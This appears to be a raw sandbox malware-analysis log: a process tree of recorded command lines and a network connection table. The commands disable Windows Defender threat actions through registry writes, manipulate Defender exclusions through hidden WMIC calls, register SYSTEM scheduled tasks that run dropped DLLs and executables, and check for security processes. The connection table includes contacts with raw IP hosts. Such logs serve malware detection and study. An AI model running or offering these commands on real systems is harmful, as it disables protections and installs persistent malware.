forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9fa3946f8,0x7ff9fa394708,0x7ff9fa394718
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "btZaCbGShXZoJDfvCg"
C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\hsUwQAlMU\xuHGDU.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ucrVpivlTlXwlAC" /V1 /F
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\cmd.exe
cmd /c md 331913
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "ucrVpivlTlXwlAC2" /F /xml "C:\Program Files (x86)\hsUwQAlMU\kJrbVKY.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "ucrVpivlTlXwlAC"
C:\Windows\SysWOW64\findstr.exe
findstr /V "EnquiryAnContributionRefers" Tank
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "ucrVpivlTlXwlAC"
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c82192ee-6cb5-4bc0-9ef0-fb818773790a} -Embedding
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gXuMbmSriUtfuo" /F /xml "C:\Program Files (x86)\dlfHiRefefjU2\XgzpZcu.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "ZEKxHChbZmoqN2" /F /xml "C:\ProgramData\nivjmgppGaMJQQVB\ngAfYzJ.xml" /RU "SYSTEM"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9fe1d46f8,0x7ff9fe1d4708,0x7ff9fe1d4718
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "GJlNcuNKEmfKGuMTK2" /F /xml "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR\WcNgtzj.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5960 -ip 5960
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5960 -s 3168
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "jVeWQSRcqyudsTDYlcg2" /F /xml "C:\Program Files (x86)\QtKEgKYoTGTqC\wreHbsL.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "BjyVbWVaXyfCTlHuI" /SC once /ST 06:19:10 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\QqEAMUespgTHJnVz\fziOnKcf\eBOGRLS.dll\",#1 /kpdidI 385118" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "BjyVbWVaXyfCTlHuI"
C:\Windows\system32\rundll32.EXE
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\QqEAMUespgTHJnVz\fziOnKcf\eBOGRLS.dll",#1 /kpdidI 385118
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\QqEAMUespgTHJnVz\fziOnKcf\eBOGRLS.dll",#1 /kpdidI 385118
C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\vUpjdUek\jeyJgLg.exe
"C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\vUpjdUek\jeyJgLg.exe" /S zs
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "BjyVbWVaXyfCTlHuI"
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b Ph + Shoot 331913\r
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\331913\Rent.pif
331913\Rent.pif 331913\r
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
C:\Windows\SysWOW64\PING.EXE
ping -n 5 127.0.0.1
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
C:\Users\Admin\Desktop\a\Newoff.exe
C:\Users\Admin\Desktop\a\Newoff.exe
C:\ProgramData\cmd.exe
C:\ProgramData\cmd.exe
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9fe1d46f8,0x7ff9fe1d4708,0x7ff9fe1d4718
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "btZaCbGShXZoJDfvCg" /SC once /ST 16:42:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\vUpjdUek\jeyJgLg.exe\" PP /S" /V1 /F
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C schtasks /run /I /tn btZaCbGShXZoJDfvCg"
C:\Windows\SysWOW64\cmd.exe
/C schtasks /run /I /tn btZaCbGShXZoJDfvCg
\??\c:\windows\SysWOW64\schtasks.exe
schtasks /run /I /tn btZaCbGShXZoJDfvCg
C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\vUpjdUek\jeyJgLg.exe
C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\vUpjdUek\jeyJgLg.exe PP /S
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9fe1d46f8,0x7ff9fe1d4708,0x7ff9fe1d4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff9fe1d46f8,0x7ff9fe1d4708,0x7ff9fe1d4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9fe1d46f8,0x7ff9fe1d4708,0x7ff9fe1d4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9fe1d46f8,0x7ff9fe1d4708,0x7ff9fe1d4718
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa.exe opssvc.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | 234.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 142.250.200.14:443 | apis.google.com | udp |
| US | 8.8.8.8:53 | 195.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.179.238:443 | play.google.com | udp |
| GB | 142.250.179.238:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | 238.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.187.238:443 | clients2.google.com | udp |
| GB | 142.250.187.238:443 | clients2.google.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 238.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 145.83.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | filescan.io | udp |
| US | 172.67.70.67:443 | filescan.io | tcp |
| US | 172.67.70.67:443 | filescan.io | tcp |
| US | 8.8.8.8:53 | www.filescan.io | udp |
| US | 8.8.8.8:53 | cdnjs.cloudflare.com | udp |
| US | 104.26.14.230:443 | www.filescan.io | udp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | tcp |
| US | 8.8.8.8:53 | 67.70.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 230.14.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn-cookieyes.com | udp |
| US | 104.26.14.230:443 | www.filescan.io | udp |
| US | 104.22.58.91:443 | cdn-cookieyes.com | tcp |
| US | 8.8.8.8:53 | log.cookieyes.com | udp |
| IE | 52.31.17.134:443 | log.cookieyes.com | tcp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | udp |
| US | 104.22.58.91:443 | cdn-cookieyes.com | tcp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| US | 8.8.8.8:53 | platform.twitter.com | udp |
| GB | 172.217.169.74:443 | content-autofill.googleapis.com | tcp |
| NL | 192.229.233.25:443 | platform.twitter.com | tcp |
| US | 8.8.8.8:53 | 14.25.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.58.22.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.17.31.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.233.229.192.in-addr.arpa | udp |
| GB | 172.217.169.74:443 | content-autofill.googleapis.com | udp |
| US | 8.8.8.8:53 | syndication.twitter.com | udp |
| US | 104.244.42.200:443 | syndication.twitter.com | tcp |
| NL | 192.229.233.25:443 | platform.twitter.com | tcp |
| NL | 192.229.233.25:443 | platform.twitter.com | tcp |
| NL | 192.229.233.25:443 | platform.twitter.com | tcp |
| NL | 192.229.233.25:443 | platform.twitter.com | tcp |
| NL | 192.229.233.25:443 | platform.twitter.com | tcp |
| US | 8.8.8.8:53 | 200.42.244.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | directory.cookieyes.com | udp |
| IE | 52.210.197.119:443 | directory.cookieyes.com | tcp |
| US | 8.8.8.8:53 | 119.197.210.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 151.101.2.49:443 | urlhaus.abuse.ch | tcp |
| RU | 147.45.47.70:80 | 147.45.47.70 | tcp |
| CN | 124.71.81.174:80 | tcp | |
| US | 8.8.8.8:53 | 49.2.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.47.45.147.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.83.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | f.123654987.xyz | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| DE | 49.13.194.118:80 | 49.13.194.118 | tcp |
| RU | 5.42.66.47:80 | 5.42.66.47 | tcp |
| US | 8.8.8.8:53 | free.360totalsecurity.com | udp |
| US | 8.8.8.8:53 | 118.194.13.49.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 47.66.42.5.in-addr.arpa | udp |
| NL | 151.236.127.172:443 | free.360totalsecurity.com | tcp |
| RU | 88.212.252.98:443 | softcatalog.ru | tcp |
| US | 8.8.8.8:53 | 172.127.236.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | st.p.360safe.com | udp |
| US | 8.8.8.8:53 | s.360safe.com | udp |
| IE | 54.77.42.29:3478 | st.p.360safe.com | udp |
| IE | 54.77.42.29:3478 | st.p.360safe.com | udp |
| US | 8.8.8.8:53 | iup.360safe.com | udp |
| US | 8.8.8.8:53 | tr.p.360safe.com | udp |
| IE | 54.76.174.118:80 | tr.p.360safe.com | udp |
| DE | 52.29.179.141:80 | s.360safe.com | tcp |
| NL | 151.236.127.172:80 | iup.360safe.com | tcp |
| NL | 151.236.127.172:80 | iup.360safe.com | tcp |
| NL | 151.236.127.172:80 | iup.360safe.com | tcp |
| NL | 151.236.127.172:80 | iup.360safe.com | tcp |
